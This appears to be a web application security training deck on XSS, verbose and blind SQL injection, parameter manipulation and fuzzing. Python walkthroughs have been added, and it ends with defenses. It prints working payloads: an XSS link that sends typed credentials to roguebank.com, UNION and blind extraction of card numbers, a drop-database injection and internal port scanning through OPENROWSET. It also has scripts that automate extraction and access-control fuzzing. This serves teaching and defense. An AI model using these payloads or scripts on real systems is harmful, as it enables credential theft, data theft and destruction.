Comparing web app sec to host / network security

Cross-site-scripting 

XSS Proxy 

SQL Injection 

SQL Injection "spot" techniques 

Nasty SQL Injections 

Blind SQL Injection 

Testing ACLs with param manip 

Web Telnet: Something fun for WebDav Uploads 

Bad Extension source disclosures 

Managing web app sec 

Contributing factors to the problem 
Approach to web app sec programs 
Why the C&A process fails web app sec 
Web Application Development "Truisms"



Web applications are software 



Multi-billion dollar software companies inadvertently create a 
massive number of vulnerabilities in their software 



Your web developers have a lot less training and resources than 
software companies do. 



Development standards emphasize functionality, not security 



C-Levels understand other topics better - IDS / IPS, patches 



Web App dev not approached as engineering 
Web Application Attacks

[Figure: the host / network attack surface. Labels: Known Web Server Attacks, OS Attacks, Network Attacks, all pointing at the Webserver box labelled "Known Vulnerabilities - Misconfigurations".]

Known vulnerabilities in the server, OS and network: more manageable due to uniformity

Global notification

Standardized testing
Web App is A Different Paradigm



Vulnerabilities are custom 

No global announcement 

No fix handed down 

Non-standard testing 

Overall more difficult management 



Bottom Line: It's YOUR problem 



Copyright 2005 SPI Dynamics


Web Application Vulnerability Characteristics

Affects all Web applications:

• Exists in your own application, not the operating system

• Can exist regardless of the Web server, operating system, configuration, or patch level

Sometimes requires nothing more than a Web browser

Orders of magnitude easier than buffer overflows

Hard for network-layer monitoring to catch:

SSL encrypted traffic, huge volume

Rules would have to be granular to each input on each page, and change as the app changes
Typical Security Model

Hardened Builds
- Patch Management
- Configuration Management

Network Scanning

Firewalls

IDS / IPS

AV, anti-spyware, anti-spam
Typical Web App Sec Practices



This Page Intentionally Left Blank 
Tuesday's BugTraq Summary Pt 1

FRONT AND CENTER

1. Windows rootkits of 2005, part three
2. Patching a broken Windows

BUGTRAQ SUMMARY

1. MTink Home Environment Variable Buffer Overflow Vulnerability
2. MyBB Print Thread Script HTML Injection Vulnerability
3. MyBB File Upload SQL Injection Vulnerability
4. IBM AIX GetShell and GetCommand File Enumeration Vulnerability
5. IBM AIX GetShell and GetCommand Partial File Disclosure Vulnerability
6. InTouch User Variable SQL Injection Vulnerability
7. PHPJournaler Readold Variable SQL Injection Vulnerability
8. Chimera Web Portal Multiple Input Validation Vulnerabilities
9. B-Net Multiple HTML Injection Vulnerabilities
10. ScozNet ScozBook AdminName Variable SQL Injection Vulnerability
11. VBulletin Event Title HTML Injection Vulnerability
12. Drupal URL-Encoded Input HTML Injection Vulnerability
13. File::ExtAttr Extended File Attribute Off-By-One Buffer Overflow Vulnerability
14. DiscusWare Discus Error Message Cross-Site Scripting Vulnerability
15. Gentoo Pinentry Local Privilege Escalation Vulnerability
Tuesday's BugTraq Summary Pt 2

16. INCOGEN Bugport Multiple SQL Injection Vulnerabilities
17. SCO OpenServer Termsh Buffer Overflow Vulnerability
18. INCOGEN Bugport Index.PHP Multiple Cross-Site Scripting Vulnerabilities
19. EFileGo Multiple Input Validation Vulnerabilities
20. Primo Place Primo Cart Multiple SQL Injection Vulnerabilities
21. Valdersoft Shopping Cart Remote File Include Vulnerability
22. Intel Graphics Accelerator Driver Remote Denial Of Service Vulnerability
23. Linux Kernel SET_MEMPOLICY Local Denial of Service Vulnerability
24. ESRI ArcPad APM File Processing Buffer Overflow Vulnerability
25. IDV Directory Viewer Index.PHP Information Disclosure Vulnerability
26. raSMP User-Agent HTML Injection Vulnerability
27. Linux Kernel FIB_LOOKUP Denial of Service Vulnerability
28. Lizard Cart CMS Multiple SQL Injection Vulnerabilities
29. Linux Kernel Sysctl_String Local Buffer Overflow Vulnerability
30. Linux Kernel DVB Driver Local Buffer Overflow Vulnerability
31. KPdf and KWord Multiple Unspecified Buffer and Integer Overflow Vulnerabilities
32. OpenBSD DEV/FD Arbitrary File Access Vulnerability
33. PHP MySQL_Connect Remote Buffer Overflow Vulnerability
34. Apple AirPort Remote Denial of Service Vulnerability
Tuesday's BugTraq Pt 3

35. Blue Coat Systems WinProxy Remote Host Header Buffer Overflow Vulnerability
36. Blue Coat Systems WinProxy Remote Denial Of Service Vulnerability
37. Blue Coat Systems WinProxy Telnet Remote Denial Of Service Vulnerability
38. HylaFAX Remote PAM Authentication Bypass Vulnerability
39. Hylafax Multiple Scripts Remote Command Execution Vulnerability
40. Apache mod_auth_pgsql Multiple Format String Vulnerabilities
41. Foro Domus Multiple Input Validation Vulnerabilities
42. OnePlug CMS Multiple SQL Injection Vulnerabilities
43. iNETstore Online Search Cross-Site Scripting Vulnerability
44. ADN Forum Multiple Input Validation Vulnerabilities
45. IBM Lotus Domino and Notes Multiple Unspecified Vulnerabilities
46. Timecan CMS ViewID SQL Injection Vulnerability
47. Modular Merchant Shopping Cart Cross-Site Scripting Vulnerability
48. TheWebForum Multiple Input Validation Vulnerabilities
49. Aquifer CMS Index.ASP Cross-Site Scripting Vulnerability
50. TinyPHPForum Multiple Directory Traversal Vulnerabilities
51. NetSarang XLPD Remote Denial of Service Vulnerability
52. Navboard Multiple BBCode Tag Script Injection Vulnerabilities
Cross-Site-Scripting

Download the Cross-Site-Scripting Whitepaper from http://www.SPIDynamics.com

Cross-Site Scripting: Find the vulnerable field

[Screenshots: the FreeBank online "Customer Login" page (Financial Planning / Services / Your Accounts / Customer Support). A failed login as "Matt" returns the page with "Invalid Login: Matt" above the Username field. A login with the username <script>document.write("Test")</script> returns "Invalid Login: Test": the browser executed the script.]

• Website accepts input from the user

• Replays their input without validating it

• Accepts JavaScript as input and replays it to the browser

The page source shows the input echoed straight into the HTML:

<FORM ACTION="login1.asp" METHOD="post">
Invalid Login: <script>document.write("Test")</script><br>
Username:<BR>
<INPUT TYPE="text" NAME="login" STYLE="border: 1px solid black; ...">
Password:<BR>
<INPUT TYPE="password" NAME="password" STYLE="border: 1px solid black; ...">
Enter JavaScript

[Screenshot: Internet Explorer with the address]

http://endo.webappsecurity.com/banklogin.asp?err=Invalid%20Login:%20<script>document.write("Test")</script>

[The page renders "Invalid Login: Test" above the Username / Password fields.]

Malicious script is entered in a form field, but is passed to the next page as a parameter in a URL

The URL with the malicious script in the parameter can now be distributed as a vector
Cross-Site-Scripting Attack Vector

[Screenshot: a phishing e-mail from "FreeBank Special Offer" with an online bank banner and a CLICK HERE button. Body: "CONGRATULATIONS - You have won $200.00 from FREEBANK. As an incentive to use online banking and to show appreciation for our customers, we are giving $200 to any customer who uses online banking this week! Simply click here and login to receive your FREE CASH!"]

Cross-Site-Scripting attack via emailed vector.

The innocent-looking link has embedded JavaScript:

href="http://www.freebank.com/banklogin.asp?serviceName=FreebankcaastAccess&templateName=prod_sel.forte&...&err=%3C/form%3E%3Cform%20action=%22login1.asp%22%20method=%22post%22%20onsubmit=%22XSSimage%20=%20new%20Image;XSSimage.src='http://www.roguebank.com/'%20%2b%20document.forms(1).login.value%20%2b%20':'%20%2b%20document.forms(1).password.value;%22%3E"
Decoded Attack Sequence

No Alarms and No Surprises

[Screenshot: the original FreeBank page ("Register for an Interest Checking Account with FreeBank: First Name / Last Name / Register") with its usual authorised-use banner. Nothing looks out of place.]

• Original legitimate website

• No login errors, no changes, user works normally

• User ID and Password quietly handed off to a remote website

The err parameter, decoded:

</form>
<form action="login1.asp" method="post" onsubmit="XSSimage = new Image; XSSimage.src='http://www.roguebank.com/' + document.forms(1).login.value + ':' + document.forms(1).password.value;">
What Else

document.cookie
window.location
document.write (your own HTML)
window.open
window.close

Lets you steal the cookie from the site

Lets you read the forms on the page that has the XSS

Lets you create fake login forms etc.
Massive Advancements in XSS

XSS Proxy by Anton Rager - revealed at Shmoocon 2005
http://sourceforge.net/projects/xss-proxy

Opens an iframe via an XSS

- (i.e. param=document.write('<iframe src=...

The DOM trusts this new frame - it was opened by the parent site

The frame source is xss-proxy running on the attacker's machine

Chunks and encodes the current parent URL / HTML into requests to the attacker's machine via this frame

- Attacker sees what the victim sees

Receives commands via script from the attacker's machine

- Attacker controls what the victim sees and does

Makes XSS considerably more dangerous.
XSS Defenses

Input AND output validation

Always validate input
Always validate input
Always validate input

Validate/encode output: HTML encoding helps break XSS

More on good / bad input validation later
SQL Injection

Download the SQL Injection Whitepaper from http://www.SPIDynamics.com

Verbose and Blind

Two types of SQL Injection

Verbose: lack of error handling provides verbose feedback to the browser. Greatly enables the attacks.

Blind: input is still vulnerable to SQL Injection, but error handling is performed to prevent ODBC errors from displaying in the browser. Still vulnerable; requires more advanced and time-consuming techniques.
SQL Injection

[Screenshot: Firefox on the Statistics / Login page. Instead of "Bad Username or Incorrect Password", the "Error:" field lists the ODBC server_info keys (ACCESSIBLE_SPROC, ACCESSIBLE_TABLES, COLLATION_SEQ, COLUMN_LENGTH, DBMS_NAME, DBMS_VER, DDL_IN_TRANSACTION, DESCENDING_INDEXES, DROP COLUMN, IDENTIFIER_CASE, INCREASE_COLUMN_LENGTH, MAX_INDEX_COLS, MAX_OWNER_NAME_LENGTH, MAX_QUAL_LENGTH, MULTI_RESULT_SETS, NAMED_TRANSACTIONS, OWNER_TERM, QUALIFIER_TERM, REMOTE_SPROC, RENAME COLUMN).]

Massively serious issue

Exploits common techniques developers use to query databases

Allows an attacker to indirectly access the database by piggybacking their queries onto the web developer's queries.

Bottom Line: Turns any web surfer into your new Database Administrator ;)
Database Driven Page

http://127.0.0.1/stats/ShowError.asp?ErrorCode=2

Login

Error: Bad Username

Please try again.
Return to Login Page

• Page reads ErrorCode from the request

• Uses ErrorCode in a SQL query

• Writes the results of the query
Common Database Query

Query written as a text string; the query parameter is appended to it:

sSql = "select ErrorMessage from ErrorMessages where ErrorCode = " & Request("ErrorCode")

http://127.0.0.1/stats/ShowError.asp?ErrorCode=2

select ErrorMessage from ErrorMessages where ErrorCode = 2
Problem: Unvalidated Input

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string
/stats/ShowError.asp, line 33

The invalid character entered is used in the query

• The resulting back-end query produces an ODBC error message:

select ErrorMessage from ErrorMessages where ErrorCode = 2'
Piggybacking Queries with UNION

Values entered into the parameter ErrorCode now have the ability to modify the query itself (instead of just being a parameter to the query):

select ErrorMessage from ErrorMessages where ErrorCode = 9 union select name from sysobjects where xtype='u'

The UNION keyword tells SQL to combine two statements into one
Enumerate all tables in the database

[Screenshot: the error page now lists the user tables (bank_logins, error_messages and several others) followed by "Invalid AccountName".]

sysobjects stores the names of the tables in the database

name = name of the table

xtype = type of table (system, user)

xtype='u' = all user tables, no system tables.
A SubQuery Enumerates Columns in the Table

...union%20select%20name%20from%20syscolumns%20where...

[Screenshot: the error page lists the columns of the chosen table: card_number, exp, name, ... followed by "Invalid AccountName".]

Columns are stored in syscolumns

Keyed on ID

Subquery against ID in sysobjects for the table you want:

select name from syscolumns where id=(select id from sysobjects where name='table')
Select the data from the column

[Screenshot: the error page now lists card numbers - 1254666633337890, 1234673911114567, 5551444422226666, 76543211937654321 - followed by "Please try again. Return to Login Page".]

4 HTTP packets to your data:

Find the injection
Select tables from sysobjects
Select columns from syscolumns
Select data from the column

Can be reduced:

- Don't need to do an individual test; the test could be the exploit

- Reduce enumerations with more advanced queries
More Techniques

Page Returns Only One Record at a Time

Change the code from:

do until rs.eof
    response.write rs(0) & "<br>"
    rs.movenext
loop

To just: response.write rs(0)
Incrementing the queries

ErrorCode=2 union select card_number from bank_cards where 1=1

1 is always equal to 1, returns the first record

Error:
123-445-4222
Please try again

ErrorCode=2 union select card_number from bank_cards where card_number > '123-445-4222'

A simple Boolean operator returns the next number; just rinse and repeat ...

Error:
201-442-5822
Please try again
Dealing with Strings

Change the code from this:

sSql = "select message from Error_Messages where Code = " & request("ErrorCode")

To this:

sSql = "select message from Error_Messages where Code = '" & request("ErrorCode") & "'"

The page now expects a string; everything entered is inserted between single quotes
Escaping from Strings

ErrorCode=2' union select card_number from bank_cards where '1'='1

The query becomes:

select message from Error_Messages where Code = '2' union select card_number from bank_cards where '1'='1'

Error:
123-445-4222
Please try again.
Page Doesn't Print Response

ErrorCode=convert(int,(select top 1 name from sysobjects))

• Use the CONVERT function

• CONVERT is used to convert datatypes

• When it fails, the error message shows you the value that failed to convert - the data you asked for

Limitation: can only select one row at a time
Trapped in Middle of Query

Change the code to:

sSql = "select message from Error_Messages where Code = " & request("ErrorCode") & " and message like '%error' "

Injections are now trapped in the middle of the query by an "unbreakable" where clause
Breaking Out of Queries

ErrorCode=2%20union%20select%20card_number%20from%20bank_cards%20--

Comment characters at the end of the injection truncate the rest of the query string:

select message from Error_Messages where Code = 2 union select card_number from bank_cards --and message like '%error'
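The sequence from "Common Database Query" through "Breaking Out of Queries", as an added example that is not the deck's or SPI Dynamics' code: ShowError.asp's concatenated query is rebuilt over an in-memory SQLite database, and the UNION chain (tables, columns, data), the one-row-at-a-time walk and the quote-and-comment break-out are run against it, next to the parameterized version that survives every one of them. SQLite has no sysobjects or syscolumns, so sqlite_master and pragma_table_info() stand in for them; table and column names follow the slides and the card numbers are constructed.

```python
import sqlite3

# Added example. SQLite stands in for the deck's SQL Server back end:
# sqlite_master plays sysobjects and pragma_table_info() plays syscolumns
# (pragma_table_info() as a table needs SQLite >= 3.16). Table and column
# names follow the slides; the card numbers are constructed.

def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE ErrorMessages (ErrorCode INTEGER, ErrorMessage TEXT);
        INSERT INTO ErrorMessages VALUES (1, 'Invalid AccountName'), (2, 'Bad Username');
        CREATE TABLE bank_cards (id INTEGER, card_number TEXT, exp TEXT, name TEXT);
        INSERT INTO bank_cards VALUES
            (1, '1254666633337890', '01/07', 'A. Customer'),
            (2, '5551444422226666', '11/06', 'B. Customer');
    """)
    return conn

def show_error_vulnerable(conn, error_code):
    # ShowError.asp as on the slide: Request("ErrorCode") is glued onto the SQL text
    sql = "select ErrorMessage from ErrorMessages where ErrorCode = " + error_code
    return [row[0] for row in conn.execute(sql)]

def show_error_quoted(conn, error_code):
    # "Dealing with Strings" + "Trapped in Middle of Query": quoted, then a fixed clause
    sql = ("select ErrorMessage from ErrorMessages where ErrorCode = '" + error_code
           + "' and ErrorMessage like '%Name%'")
    return [row[0] for row in conn.execute(sql)]

def show_error_safe(conn, error_code):
    # Parameterized query: the value is bound, never parsed as part of the statement
    sql = "select ErrorMessage from ErrorMessages where ErrorCode = ?"
    return [row[0] for row in conn.execute(sql, (error_code,))]

def attack_chain(conn):
    """Steps 2-4 of the deck against the integer-context page. ErrorCode=9 matches
    no real message, so every row that comes back belongs to the injected SELECT."""
    tables = show_error_vulnerable(
        conn, "9 union select name from sqlite_master where type='table'")
    columns = show_error_vulnerable(
        conn, "9 union select name from pragma_table_info('bank_cards')")
    cards = show_error_vulnerable(conn, "9 union select card_number from bank_cards")
    return {"tables": sorted(tables), "columns": sorted(columns), "cards": sorted(cards)}

def break_out_of_string(conn):
    """Escaping from Strings + Breaking Out of Queries: close the quote, UNION in
    our query, and let -- discard the trailing WHERE clause the developer added."""
    return show_error_quoted(conn, "9' union select card_number from bank_cards --")

def walk_one_at_a_time(conn):
    """Incrementing the queries: when the page prints only rs(0), fetch one row per
    request with a boolean on the last value seen, then rinse and repeat."""
    seen, last = [], ""
    while True:
        rows = show_error_vulnerable(
            conn, f"9 union select min(card_number) from bank_cards where card_number > '{last}'")
        if not rows or rows[0] is None:      # min() over an empty set: nothing left
            return seen
        last = rows[0]
        seen.append(last)
```

The parameterized form does not "filter" anything: the same payloads that enumerate the schema through show_error_vulnerable simply fail to match an ErrorCode in show_error_safe and return no rows, which is the point of the WhiteList slide's "no chance to modify the base query".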
More SQL Injection Goodness

SELECT is just the first 1%

DML: Data Manipulation Language - select, insert, update, delete

DDL and administrative statements: add / drop / shrink / grow databases

Stored procedures, extended stored procedures, functions

Server management: users, network, disks
SQL Injection Annoyances

Annoy the DBA

Seriously **** OFF THE DBA !!

http://127.0.0.1/stats/ShowError.asp?ErrorCode=9;drop%20database%20prod_db
Who is the App Logged In As?

SA? Predictable, but BORING

Let's try to be a bit more creative

[Screenshot: the error page prints "sa" in place of the error message, then "Please try again. Return to Login Page".]
Adding your Own Database Account

[Screenshot: SQL Server Enterprise Manager, Security > Logins on (local). The login list now holds N074H4x0r (Standard) alongside sa (Standard), test (Standard), the ASPNET account (NT User) and BUILTIN\Administrators (NT Group).]

Not that we really needed a login anyhow
Port Scanning the Internal Network

Port scanning the back end network from the DB server? Priceless

Just try to initiate a new database connection within the query (in SQL Server, OPENROWSET with a connection string: the Address= field names the host and port):

'uid=Thanks;pwd=ForThePortScan;network=DBMSSOCN;Address=yahoo.com,80;timeout=3','select ...

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server][DBNETLIB][ConnectionOpen (PreLoginHandshake()).]General network error. Check your network documentation.
/stats/ShowError.asp, line 39

Something's wrong (because it isn't a database server!) but the port's open ;)
Sanctified

'uid=Thanks;pwd=ForThePortScan;network=DBMSSOCN;Address=yahoo.com,21;timeout=3','s...

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server][DBNETLIB][ConnectionOpen (Connect()).]SQL Server does not exist or access denied.
/stats/ShowError.asp, line 39

Port closed ... build a script, rinse and repeat.
Your Back End Network

[Figure: diagram of the back end network reachable from the database server; the only legible label is "Statistics".]

Not So Back End ;)
Who's Vulnerable

Ridiculous number of sites

Not aware

Aware of the vulnerability but not the defenses

Fully aware, no testing capabilities

DoD? Government? Commercial? Only small unimportant sites?

Don't Suppress Errors Without Safe Queries

The ODBC errors are the symptoms

They help, but aren't required

The problem is the way the query is formed in the web app

Not fixing the query but suppressing errors is still hackable
Blind SQL Injection



Blind Conditions 



Error Handling in Place : No ODBC error messages 

Does not necessarily print recordsets to screen 

Still using string concatenation queries : still vulnerable 



General Process: 

- Find a boolean situation you can use for deduction 

- Figure out how to ask Yes / No questions instead of open-ended 
questions 

- Ask lots and lots of Yes / No questions 
Proper Error Handling In Place

[Screenshot: the CheckProductInventory page. Any database error is handled; the user only sees "Please try again. Return to Login Page".]

Does Not Print Records to Screen

if rs(0) <> "" then response.write "in stock"

Will not be able to use the UNION attack
Test for Blind

Pass a false statement (e.g. ?ProductType=2 and 1=2): the page does not say "in stock"

Pass a true statement:

?ProductType=2 and 1=1

in stock
Check Another Product
Using Substring Command

SUBSTRING command

lets you specify a range of characters from a string
accepts a query as the input
specify the start position and the number of characters

Substring("fish",1,1) returns "f"
Substring("fish",1,2) returns "fi"
Substring("fish",2,3) returns "ish"
Using Switch for Guessing

Problem: Can't print results to the screen
Solution: Guess using booleans
Is the letter greater than 'm'?

Problem: Can't grab everything at once.
Solution: Grab one item at a time using TOP 1
select top 1 name from sysobjects where xtype='u'

Problem: Don't want to guess a full name at a time
Solution: Isolate each letter and guess those.
Substring((select top 1 name from sysobjects where xtype='u'),1,1)
20 Questions

?ProductType=2 and substring((select top 1 name from sysobjects where xtype='u'),1,1)>'m'

Combines two queries: the hardcoded query and our injected query

Asks a Yes / No question: does the first letter of the first name in sysobjects come after the letter m?
Bracket to Reduce Guessing

Dividing in half to reduce to a single letter

Faster work

Less log / network traffic

Not greater than 'm', therefore between 'a' and 'm'

?ProductType=2 and substring((select top 1 name from sysobjects where xtype='u'),1,1)<'g'

in stock
Check Another Product

?ProductType=2 and substring((select top 1 name from sysobjects where xtype='u'),1,1)>'c'

[Screenshots: each answer narrows the range - "in stock" means yes, the plain "Check Another Product" page means no.]
Repetez

Substring(string, character position, number of characters)

Substring('tbl_credit_cards',1,1) = 't'
Substring('tbl_credit_cards',2,1) = 'b'
Substring('tbl_credit_cards',3,1) = 'l'
Substring('tbl_credit_cards',4,1) = '_'
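The procedure from "Test for Blind" through "Repetez", as an added example that is not the deck's code: a SQLite-backed stand-in for CheckProductInventory.asp that swallows errors and prints nothing but "in stock" or the generic page, and a client that turns that one bit into the first user table name by bracketing each character, the way the slides bisect on 'm', 'g' and 'c'. The table names and stock figures are constructed; SQLite's unicode() and substr() replace SQL Server's ASCII() and SUBSTRING(), and "order by name limit 1" replaces "top 1".

```python
import sqlite3

# Added example, not the deck's own code. CheckProductInventory.asp is simulated
# over SQLite; the tables and quantities below are constructed. In SQLite,
# sqlite_master is the sysobjects equivalent, so the "top 1 user table" becomes:
FIRST_USER_TABLE = "select name from sqlite_master where type='table' order by name limit 1"

def build_inventory_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE warehouse (ProductType INTEGER, quantity INTEGER);
        INSERT INTO warehouse VALUES (2, 5);
        CREATE TABLE tbl_credit_cards (card_number TEXT);
    """)
    return conn

class BlindOracle:
    """Error handling in place, no recordset printed, but the query is still built by
    string concatenation: the only thing that leaks is 'in stock' versus the generic page."""
    def __init__(self, conn):
        self.conn, self.questions = conn, 0

    def page(self, product_type):
        sql = "select quantity from warehouse where ProductType = " + product_type
        try:
            row = self.conn.execute(sql).fetchone()
        except sqlite3.Error:
            return "Please try again."          # the ODBC error is swallowed, not shown
        return "in stock" if row and row[0] else "Please try again."

    def ask(self, condition):
        """One Yes/No question: 'and (condition)' is true -> 'in stock', false -> generic page."""
        self.questions += 1
        return self.page(f"2 and ({condition})") == "in stock"

def extract_char(oracle, subquery, pos):
    """Bracket the character at `pos` of the subquery's result over printable ASCII:
    about 7 questions instead of up to 95 sequential guesses."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)

def extract_string(oracle, subquery):
    """Repetez: position by position until the string runs out."""
    out, pos = "", 1
    while oracle.ask(f"length(({subquery})) >= {pos}"):
        out += extract_char(oracle, subquery, pos)
        pos += 1
    return out
```

Counting oracle.questions after a run is the cheap way to see what "less log / network traffic" buys: a 16-character name costs roughly 130 requests with bracketing, against well over a thousand if each position were guessed letter by letter.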
Input Validation



Good Advice for Input Validation 



"as we know, there are known knowns; there are 
things we know we know. We also know there 
are known unknowns; that is to say we know 
there are some things we do not know. But there 
are also unknown unknowns -- the ones we don't 
know we don't know " 



- Donald Rumsfeld Tuesday, Feb. 12, 2002 



Source: http://www.defenselink.mil/transcripts/2002/t02122002_t212sdv2.html 
Don't Blacklist

You don't know what you don't know

Stripping out bad words

- Defense: remove "union" or "select"

- Attack: ununionion seselectlect yadda yadda yadda

Stripping out single quotes

- Integers don't require quotes

- Commands - shutdown? Drop?

Relying solely on stored procedures

- Attackable if you still concatenate strings to call the procedure

Relying on the platform alone

- MagicQuotes?
WhiteList

Validate against the known good format
- A zip code should always be [0-9][0-9][0-9][0-9][0-9]

Trim lengths

Use parameterized queries

- All input to the query is treated as a parameter; no chance to modify the base query

HTML encode output (for XSS)
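An added example, not from the deck, covering the "Don't Blacklist" and "WhiteList" slides together with the output-encoding point from "XSS Defenses": the word-stripping filter and why "ununionion" walks straight through it, a per-field whitelist with a length limit, and banklogin.asp's err reflection with and without HTML encoding. The field names and their formats are assumptions.

```python
import html
import re

# Added example, not from the deck. The field set and formats are assumptions.

def strip_bad_words(value):
    """The blacklist the slide warns against: delete 'union' and 'select' once each."""
    for word in ("union", "select"):
        value = value.replace(word, "")
    return value

# Known-good format and maximum length per field (hypothetical field set).
FORMATS = {
    "zip": (re.compile(r"[0-9]{5}"), 5),
    "errorcode": (re.compile(r"[0-9]{1,4}"), 4),
    "username": (re.compile(r"[A-Za-z0-9_.-]+"), 32),
}

def validate(field, value):
    """Whitelist check: the value must be exactly the expected shape and no longer than
    its limit. Returns the value, or None to reject it (never 'clean' it and pass it on)."""
    pattern, max_len = FORMATS[field]
    if len(value) > max_len or pattern.fullmatch(value) is None:
        return None
    return value

def render_error_vulnerable(err):
    """banklogin.asp as the deck shows it: the err parameter is replayed verbatim."""
    return '<form action="login1.asp" method="post">Invalid Login: ' + err + "<br>Username:<br>"

def render_error_safe(err):
    """Same page with the output HTML-encoded: the browser displays the text, never runs it."""
    return ('<form action="login1.asp" method="post">Invalid Login: '
            + html.escape(err, quote=True) + "<br>Username:<br>")
```

validate() rejects over-length input outright rather than truncating it, which is the stricter reading of "trim lengths": a silently shortened value can still be a valid-looking but wrong one. html.escape(quote=True) also encodes quotes, so the same call is safe for values that land inside an attribute as well as in element text.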
Parameter Manipulation



Parameter Manipulation 



Different from parameter injections 



Injections put new data types into the parameter 



Strict parameter manipulation just changes existing parameters 



Usually takes advantage of state mechanisms 
Differences Illustrated



Injection: Putting invalid data, also invalid TYPE of data 




Manipulation: Same type of data, just wrong values 
Victoria's Secret

[Screenshot: a victoriassecret.com "Order Information" page - order number, order date, ship date, ship method (UPS Ground), a billing address in Vernon Hills, IL, and the itemised order with sizes and prices - belonging to a different customer.]

Victoria's Secret, November 27, 2002

Order ID parameter in the order status page

Order status page bound to your session, but not the parameters

$50,000 fine and publicity in 2003

victoriassecret.com
Gateway Computers



Gateway Computers 

• Website stored an ID number in a cookie to identify you when 
returning to the site. 

• By changing this ID number, you are able to view the information of 
other shoppers. 

• Information viewable includes Name, Address, Phone Number, 
Order History, Last Four Digits of Credit Card, Credit Card 
Expiration Date, Credit Card Verification Code. 



Wall Street Journal 

"More Scary Tales Involving Big Holes in 
Website Security", by Lee Gomes, February 2nd 
2004 
Exploit Technique: Parameter Fuzzing

Configuring the Fuzzer

[Screenshot: SPI Fuzzer, Raw Editor. URL http://localhost:80/secure/showpage.asp?pageid=8 and the request:]

GET /secure/showpage.asp?pageid=8 HTTP/1.0
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.8) Gecko/20050...
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=...
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,...
Keep-Alive: 300

[Generators dialog: ASCII Generator, Character Generator, Decimal Number Generator, Guid Generator, WordList Reader Generator. Number Generator options: Minimum, Maximum, Increment, Loop Count, Mode = Incremental. Description: "Basic number generator. Useful for testing various reactions to small or large numbers."]

Change pageid=8 to pageid=0 - 100 and check the results
Reviewing the Results

[Screenshot: SPI Fuzzer Sessions pane after the run (Finished, 100%, Sessions: 101, Filter: Disabled):]

Fuzz Session / Redirection - 302 Object moved
Fuzz Session / Client Error - 404 File Not Found
Fuzz Session / Success - 200 OK
Fuzz Session / Client Error - 404 File Not Found
Fuzz Session / Client Error - 404 File Not Found
Fuzz Session / Client Error - 404 File Not Found
Fuzz Session / Client Error - 404 File Not Found
Fuzz Session / Redirection - 302 Object moved

Request:

GET /secure/showpage.asp?pageid=2 HTTP/1.0
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.8) Gecko/20050...
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=...
Accept-Language: en-us,en;q=0.5

Raw Response (pageid=2, 200 OK): "Logout ... Welcome to the Sensitive Area of our Web Site where We Have Access Control and Authentication ... The Shmoo Group is a non-..."

404s indicated no page behind that parameter

302: the page behind the parameter properly redirected to login

200: the page behind the parameter did not check access and allowed viewing

Approximately half the pages had broken access controls
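The pageid sweep above, as an added example that is neither SPI Fuzzer nor the deck's code: a loop that plays the Number Generator over 0-100, sends every request as an unauthenticated client, buckets the responses by status the way the Sessions pane does, and reports the pageids that came back 200. The default fetcher is a constructed simulation of /secure/showpage.asp (which pageids exist, and which of them check the session, are hypothetical); live_fetch is the same probe over HTTP with redirects left unfollowed, so a 302 to the login page is counted as a 302 rather than turned into the login form's 200.

```python
import urllib.error
import urllib.request
from urllib.parse import urlencode

# Added example, not SPI Fuzzer or the deck's code. PAGES is a constructed model
# of /secure/showpage.asp: which pageids exist and which ones check for a session
# before rendering. All of it is hypothetical.
PAGES = {
    2:  {"checks_session": False, "body": "Welcome to the Sensitive Area of our Web Site"},
    5:  {"checks_session": True,  "body": "account summary"},
    8:  {"checks_session": True,  "body": "starting page"},
    13: {"checks_session": False, "body": "admin report"},
}

def simulated_fetch(url, authenticated=False):
    """Returns (status, body) the way the fuzzer's Sessions pane reports them."""
    query = url.split("?", 1)[1]
    pageid = int(dict(p.split("=", 1) for p in query.split("&"))["pageid"])
    page = PAGES.get(pageid)
    if page is None:
        return 404, "File Not Found"
    if page["checks_session"] and not authenticated:
        return 302, "Object moved"           # bounced to the login page
    return 200, page["body"]

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None                          # surface the 302 instead of following it

def live_fetch(url):
    """The same probe over HTTP as an unauthenticated client: no cookies, no redirects."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:    # 302 / 404 / ... arrive here
        return err.code,  err.reason

def fuzz_pageid(fetch, base="http://localhost:80/secure/showpage.asp", lo=0, hi=100):
    """Number Generator lo..hi on pageid; bucket every response by status code."""
    buckets = {200: [], 302: [], 404: [], "other": []}
    for pageid in range(lo, hi + 1):
        status, _ = fetch(f"{base}?{urlencode({'pageid': pageid})}")
        buckets.get(status, buckets["other"]).append(pageid)
    return buckets

def report(buckets):
    """A 200 with no session means the page behind that parameter never checked access."""
    exposed, protected = buckets[200], buckets[302]
    checked = len(exposed) + len(protected)
    return {"exposed": exposed, "protected": protected,
            "broken_fraction": len(exposed) / checked if checked else 0.0}
```

fuzz_pageid(live_fetch, base="http://host/secure/showpage.asp") runs the same sweep against a real target; anything in "other" (500s, 403s) deserves a look by hand, since a server error on an unexpected id is a different finding from a missing access check.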
Misconfig allowing PUTs

Improper VERBS: Exploiting PUT capabilities

Exploiting WebDAV PUTs

